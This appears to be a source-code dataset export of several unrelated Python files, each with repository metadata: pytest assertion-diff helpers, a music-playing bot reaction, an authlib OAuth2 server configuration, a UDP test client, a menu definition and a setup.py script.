                    else:
                        explanation = expl
        elif op == 'not in':
            if istext(left) and istext(right):
                explanation = _notin_text(left, right, verbose)
    except Exception:
        # A broken __repr__ on either operand must not crash the report.
        explanation = [
            u('(pytest_assertion plugin: representation of details failed. '
              'Probably an object has a faulty __repr__.)'),
            u(_pytest._code.ExceptionInfo())]
    if not explanation:
        return None
    return [summary] + explanation
def _diff_text(left, right, verbose=False):
    """Return the explanation for the diff between text or bytes

    Unless --verbose is used this will skip leading and trailing
    characters which are identical to keep the diff minimal.

    If the input are bytes they will be safely converted to text.
    """
    from difflib import ndiff
    explanation = []
    # Bytes are shown via their repr so undecodable input cannot blow up here.
    if isinstance(left, py.builtin.bytes):
        left = u(repr(left)[1:-1]).replace(r'\n', '\n')
    if isinstance(right, py.builtin.bytes):
        right = u(repr(right)[1:-1]).replace(r'\n', '\n')
    if not verbose:
        i = 0 # just in case left or right has zero length
        for i in range(min(len(left), len(right))):
            if left[i] != right[i]:
                break
        # Only trim when there is a substantial common prefix (>42 chars).
        if i > 42:
            i -= 10 # Provide some context
            explanation = [u('Skipping %s identical leading '
                             'characters in diff, use -v to show') % i]
            left = left[i:]
            right = right[i:]
        if len(left) == len(right):
            for i in range(len(left)):
                # NOTE(review): left[-i] with i == 0 compares left[0], not the
                # last character -- looks off-by-one, kept as-is here.
                if left[-i] != right[-i]:
                    break
            if i > 42:
                i -= 10 # Provide some context
                explanation += [u('Skipping %s identical trailing '
                                  'characters in diff, use -v to show') % i]
                left = left[:-i]
                right = right[:-i]
    keepends = True
    explanation += [line.strip('\n')
                    for line in ndiff(left.splitlines(keepends),
                                      right.splitlines(keepends))]
    return explanation
def _compare_eq_iterable(left, right, verbose=False):
    """Return an ndiff of the pretty-printed operands (verbose mode only)."""
    if not verbose:
        return [u('Use -v to get the full diff')]
    # dynamic import to speedup pytest
    import difflib
    try:
        left_formatting = pprint.pformat(left).splitlines()
        right_formatting = pprint.pformat(right).splitlines()
        explanation = [u('Full diff:')]
    except Exception:
        # hack: PrettyPrinter.pformat() in python 2 fails when formatting items that can't be sorted(), ie, calling
        # sorted() on a list would raise. See issue #718.
        # As a workaround, the full diff is generated by using the repr() string of each item of each container.
        left_formatting = sorted(repr(x) for x in left)
        right_formatting = sorted(repr(x) for x in right)
        explanation = [u('Full diff (fallback to calling repr on each item):')]
    explanation.extend(line.strip() for line in difflib.ndiff(left_formatting, right_formatting))
    return explanation
def _compare_eq_sequence(left, right, verbose=False):
    """Explain the first differing index and any extra trailing items."""
    explanation = []
    for idx, (lv, rv) in enumerate(zip(left, right)):
        if lv != rv:
            explanation += [u('At index %s diff: %r != %r')
                            % (idx, lv, rv)]
            break
    if len(left) > len(right):
        explanation += [u('Left contains more items, first extra item: %s')
                        % py.io.saferepr(left[len(right)])]
    elif len(left) < len(right):
        explanation += [
            u('Right contains more items, first extra item: %s') %
            py.io.saferepr(right[len(left)])]
    return explanation
def _compare_eq_set(left, right, verbose=False):
    """List the items unique to each side of a set comparison."""
    explanation = []
    one_sided = (
        (u('Extra items in the left set:'), left - right),
        (u('Extra items in the right set:'), right - left),
    )
    for label, extra in one_sided:
        if extra:
            explanation.append(label)
            for item in extra:
                explanation.append(py.io.saferepr(item))
    return explanation
def _compare_eq_dict(left, right, verbose=False):
    """Explain dict inequality: common, differing and one-sided items."""
    explanation = []
    common = set(left).intersection(set(right))
    same = dict((k, left[k]) for k in common if left[k] == right[k])
    if same and not verbose:
        explanation += [u('Omitting %s identical items, use -v to show') %
                        len(same)]
    elif same:
        explanation += [u('Common items:')]
        explanation += pprint.pformat(same).splitlines()
    # Keys present on both sides but mapped to different values.
    diff = set(k for k in common if left[k] != right[k])
    if diff:
        explanation += [u('Differing items:')]
        for k in diff:
            explanation += [py.io.saferepr({k: left[k]}) + ' != ' +
                            py.io.saferepr({k: right[k]})]
    extra_left = set(left) - set(right)
    if extra_left:
        explanation.append(u('Left contains more items:'))
        explanation.extend(pprint.pformat(
            dict((k, left[k]) for k in extra_left)).splitlines())
    extra_right = set(right) - set(left)
    if extra_right:
        explanation.append(u('Right contains more items:'))
        explanation.extend(pprint.pformat(
            dict((k, right[k]) for k in extra_right)).splitlines())
    return explanation
def _notin_text(term, text, verbose=False):
    """Explain an unexpected occurrence of *term* inside *text*."""
    index = text.find(term)
    # Diff the text with the occurrence removed against the original, so the
    # '+' lines of the diff point exactly at the offending term.
    correct_text = text[:index] + text[index + len(term):]
    diff = _diff_text(correct_text, text, verbose)
    newdiff = [u('%s is contained here:') % py.io.saferepr(term, maxsize=42)]
    for line in diff:
        if line.startswith(u('Skipping')) or line.startswith(u('- ')):
            continue
        if line.startswith(u('+ ')):
            newdiff.append(u(' ') + line[2:])
        else:
            newdiff.append(line)
    return newdiff
| 35.750831
| 115
| 0.582753
|
4a0a4f4954ed3b665e87e644cc89ffe9ab293989
| 1,491
|
py
|
Python
|
core/brain/play/song/reaction.py
|
vsilent/smarty-bot
|
963cba05433be14494ba339343c9903ccab3c37d
|
[
"MIT"
] | 1
|
2016-10-08T09:01:05.000Z
|
2016-10-08T09:01:05.000Z
|
core/brain/play/song/reaction.py
|
vsilent/smarty-bot
|
963cba05433be14494ba339343c9903ccab3c37d
|
[
"MIT"
] | 1
|
2019-09-24T09:56:52.000Z
|
2019-09-24T09:56:52.000Z
|
core/brain/play/song/reaction.py
|
vsilent/smarty-bot
|
963cba05433be14494ba339343c9903ccab3c37d
|
[
"MIT"
] | null | null | null |
import logging
#from core.output import say
from core.config.settings import logger, DEMO_MUSIC_DIR
import subprocess
import os, random
class Reaction:
    """Reaction that plays a random demo song from DEMO_MUSIC_DIR."""

    def __str__(self):
        return 'Reac'

    def __init__(self, *args, **kwargs):
        """Store the original request string taken from ``req_obj``.

        BUG FIX: this method was previously decorated with ``@classmethod``,
        which bound its first parameter to the class itself, so ``request``
        and ``response`` were silently set as class-level attributes shared
        by every instance. Removing the decorator makes them proper
        per-instance attributes.
        """
        logger.info(args)
        logger.info(kwargs)
        logger.info(kwargs.get('req_obj'))
        self.request = kwargs.pop('req_obj')['request']
        self.response = None

    def continue_dialog(self):
        """False stops the current dialog after this reaction and starts a
        new one from the beginning; otherwise the request keeps being stored.
        """
        return False

    def run(self, request):
        """Play a random file from DEMO_MUSIC_DIR with mplayer (non-blocking).

        Playback happens in a detached child process; always returns True.
        """
        file = DEMO_MUSIC_DIR + random.choice(os.listdir(DEMO_MUSIC_DIR))
        logger.info('Playing... %s ' % file)
        subprocess.Popen(["/usr/bin/mplayer", file])
        return True
| 29.235294
| 90
| 0.599598
|
4a0a506a28def373c681dff69b71e82f5a737513
| 2,900
|
py
|
Python
|
app/oauth2/oauth2.py
|
yishan1331/heroku-yishan-paas
|
bd46bc8c067999b1dfb83b863b5ba64e76933d0a
|
[
"MIT"
] | null | null | null |
app/oauth2/oauth2.py
|
yishan1331/heroku-yishan-paas
|
bd46bc8c067999b1dfb83b863b5ba64e76933d0a
|
[
"MIT"
] | null | null | null |
app/oauth2/oauth2.py
|
yishan1331/heroku-yishan-paas
|
bd46bc8c067999b1dfb83b863b5ba64e76933d0a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
from authlib.integrations.flask_oauth2 import (
AuthorizationServer,
ResourceProtector,
)
#Yishan add
from authlib.integrations.sqla_oauth2 import (
create_query_client_func,
create_save_token_func,
create_revocation_endpoint,
create_bearer_token_validator,
update_client_secret_func
)
from authlib.oauth2.rfc6749 import grants
from authlib.oauth2.rfc7636 import CodeChallenge
import redis
# from .models import db,Yishan_dbRedis
from .models import OAuth2Client, OAuth2Token
# Shared module-level protector; its bearer-token validator is registered
# later in config_oauth(), which must run before any protected endpoint.
require_oauth = ResourceProtector()
def config_oauth(app,dicConfig):
    """Wire an authlib OAuth2 authorization server onto *app*.

    Builds a dedicated MySQL session and a Redis connection from *dicConfig*,
    then registers the client-credentials grant, a revocation endpoint and a
    bearer-token validator on the shared ``require_oauth`` protector.

    Returns ``(sess, DbSession, engine, Yishan_dbRedis, authorization)`` when
    the DB connectivity check passes; otherwise falls through and implicitly
    returns None.
    """
    from sqlalchemy import MetaData
    from sqlalchemy.orm import scoped_session, sessionmaker
    from sqlalchemy.engine import create_engine
    from app.modules import check_dbconnect_success
    dbUri = 'mysql+pymysql://{}:{}@{}:{}/{}?charset=utf8mb4'.format( \
                dicConfig.get("DBMYSQLUser_PaaS"), \
                dicConfig.get("DBMYSQLPassword_PaaS"), \
                dicConfig.get("DBMYSQLIp_PaaS"), \
                dicConfig.get("DBMYSQLPort_PaaS"), \
                dicConfig.get("DBMYSQLDbname_PaaS"))
    engine = create_engine(dbUri,encoding='utf-8')
    # NOTE(review): numbered prints below are leftover py2 debug output;
    # consider replacing with proper logging.
    print "111111111111111"
    metadata = MetaData(bind=engine)
    print "222222222222222"
    DbSession = scoped_session(sessionmaker(autocommit=False, \
                                            autoflush=False, \
                                            bind=engine))
    print "333333333333333"
    check_status,check_result = check_dbconnect_success(DbSession, "PaaS")
    if check_status:
        sess = DbSession()
        # Redis db index 15 is reserved here for token bookkeeping.
        POOL = redis.ConnectionPool(host=dicConfig.get("DBREDISIp_PaaS"),port=dicConfig.get("RedisPort_PaaS"),db=15,password=dicConfig.get("RedisPassword_PaaS"))
        Yishan_dbRedis = redis.Redis(connection_pool=POOL)
        #Yishan add
        update_client_secret = update_client_secret_func(sess, OAuth2Client)
        query_client = create_query_client_func(sess, OAuth2Client)
        save_token = create_save_token_func(sess, OAuth2Token, OAuth2Client, Yishan_dbRedis)
        authorization = AuthorizationServer(
            query_client=query_client,
            save_token=save_token,
            update_client_secret=update_client_secret
        )
        authorization.init_app(app)
        # support all grants
        # authorization.register_grant(grants.ImplicitGrant)
        authorization.register_grant(grants.ClientCredentialsGrant)
        # support revocation
        revocation_cls = create_revocation_endpoint(sess, OAuth2Token,Yishan_dbRedis)
        authorization.register_endpoint(revocation_cls)
        # protect resource
        bearer_cls = create_bearer_token_validator(sess, OAuth2Token, OAuth2Client, Yishan_dbRedis)
        require_oauth.register_token_validator(bearer_cls())
        return sess,DbSession,engine,Yishan_dbRedis,authorization
| 37.662338
| 161
| 0.708966
|
4a0a506fad2c8d3aadee2ccae1728fb7d7d684a0
| 251
|
py
|
Python
|
test/udp/client.py
|
Folamh/atreoraigh
|
97a4fba51908df6aa2f3a34f934fce6ef1bc5dcc
|
[
"MIT"
] | null | null | null |
test/udp/client.py
|
Folamh/atreoraigh
|
97a4fba51908df6aa2f3a34f934fce6ef1bc5dcc
|
[
"MIT"
] | null | null | null |
test/udp/client.py
|
Folamh/atreoraigh
|
97a4fba51908df6aa2f3a34f934fce6ef1bc5dcc
|
[
"MIT"
] | null | null | null |
import socket
import sys
def main():
    """Send argv[2] as a single UTF-8 UDP datagram to port argv[1] on this host."""
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = sys.argv[2].encode('utf-8')
    udp_sock.sendto(payload, ("", int(sys.argv[1])))
if __name__ == '__main__':
main()
| 20.916667
| 68
| 0.577689
|
4a0a5211136d1c2368021b84e12fc3bb04b5cb95
| 153
|
py
|
Python
|
src/icemac/ab/calexport/masterdata/menu.py
|
icemac/icemac.ab.calexport
|
ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c
|
[
"BSD-2-Clause"
] | null | null | null |
src/icemac/ab/calexport/masterdata/menu.py
|
icemac/icemac.ab.calexport
|
ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c
|
[
"BSD-2-Clause"
] | null | null | null |
src/icemac/ab/calexport/masterdata/menu.py
|
icemac/icemac.ab.calexport
|
ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c
|
[
"BSD-2-Clause"
] | null | null | null |
import icemac.addressbook.browser.menus.menu
# NOTE(review): presumably marks this menu item as selected while the
# calendar-export master data edit view is shown -- verify against
# icemac.addressbook's SelectMenuItemOn.
export_views = icemac.addressbook.browser.menus.menu.SelectMenuItemOn(
    'edit-export-masterdata.html')
| 25.5
| 70
| 0.810458
|
4a0a52c2265381d4d7f544063527eed6533203cb
| 1,988
|
py
|
Python
|
setup.py
|
oesteban/pyregseg
|
16639a048a6990465d460bfce65623556b104e51
|
[
"MIT"
] | null | null | null |
setup.py
|
oesteban/pyregseg
|
16639a048a6990465d460bfce65623556b104e51
|
[
"MIT"
] | 2
|
2017-10-13T23:15:31.000Z
|
2017-10-13T23:17:01.000Z
|
setup.py
|
oesteban/pyregseg
|
16639a048a6990465d460bfce65623556b104e51
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: oesteban
# @Date: 2015-11-19 16:44:27
# @Last Modified by: oesteban
# @Last Modified time: 2017-10-13 15:08:22
""" regseg setup script """
from __future__ import print_function, division, absolute_import, unicode_literals
def main():
    """ Install entry-point: read package metadata from regseg.__about__
    and invoke setuptools.setup with it. """
    from sys import version_info
    from setuptools import setup, find_packages
    from regseg.__about__ import (
        __version__,
        __author__,
        __email__,
        __license__,
        __description__,
        __longdesc__,
        __url__,
        __download__,
        PACKAGE_NAME,
        CLASSIFIERS,
        REQUIRES,
        SETUP_REQUIRES,
        LINKS_REQUIRES,
        TESTS_REQUIRES,
        EXTRA_REQUIRES,
    )
    # Data files bundled inside the installed package.
    package_data = {'regseg': ['data/*.json', 'data/*.txt']}
    if version_info[0] < 3:
        # setuptools under python 2 expects byte strings in package_data.
        package_data = {key.encode(): [v.encode() for v in val]
                        for key, val in list(package_data.items())}
    setup(
        name=PACKAGE_NAME,
        version=__version__,
        description=__description__,
        long_description=__longdesc__,
        author=__author__,
        author_email=__email__,
        license=__license__,
        maintainer_email=__email__,
        classifiers=CLASSIFIERS,
        # Dependencies handling
        setup_requires=SETUP_REQUIRES,
        install_requires=REQUIRES,
        dependency_links=LINKS_REQUIRES,
        tests_require=TESTS_REQUIRES,
        extras_require=EXTRA_REQUIRES,
        url=__url__,
        download_url=__download__,
        packages=find_packages(exclude=['*.tests']),
        package_data=package_data,
        entry_points={
            'console_scripts': [], # format 'mriqc=mriqc.bin.mriqc_run:main'
        },
        scripts=[
            'tools/extract_hcp.py',
            'tools/run_evaluations.py',
            'tools/run_phantoms.py'
        ],
        zip_safe=False
    )
if __name__ == "__main__":
main()
| 27.611111
| 82
| 0.60664
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.